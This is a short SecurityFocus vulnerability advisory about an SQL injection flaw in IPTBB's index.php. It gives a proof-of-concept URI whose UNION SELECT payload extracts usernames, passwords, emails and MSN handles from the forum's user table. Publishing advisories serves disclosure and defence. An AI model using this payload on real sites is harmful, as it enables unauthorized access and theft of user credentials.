Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

IPTBB 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/index.php?act=viewdir&id='+union+select+1,concat(username,char(58),password,char(58),email,char(58),msn)+from+iptbb_users+where+id=[UserID]







 

Privacy Statement
Copyright 2008, SecurityFocus